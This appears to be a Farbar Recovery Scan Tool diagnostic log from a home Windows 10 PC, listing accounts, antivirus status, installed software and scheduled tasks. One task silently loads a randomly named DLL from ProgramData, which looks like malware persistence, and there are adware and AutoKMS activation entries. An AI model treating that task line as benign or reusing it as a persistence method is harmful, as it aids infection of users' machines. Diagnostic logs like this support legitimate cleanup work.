C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-02-29 12:25

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-02-29 20:46:27)
Running from C:\Users\Kym\Desktop
Windows 10 Home (X64) (2015-08-08 15:48:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
Scansoft PDF Professional (x32 Version: - ) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {40943A4E-8129-4656-ADEA-C3441A09E687} - System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D} => /s /n /i:"/rt" "C:\PROGRA~3\3c355888\4543324a.dll"
Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EC2D2A3E-E44B-44C6-8E6E-EA7A037E1BFF} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
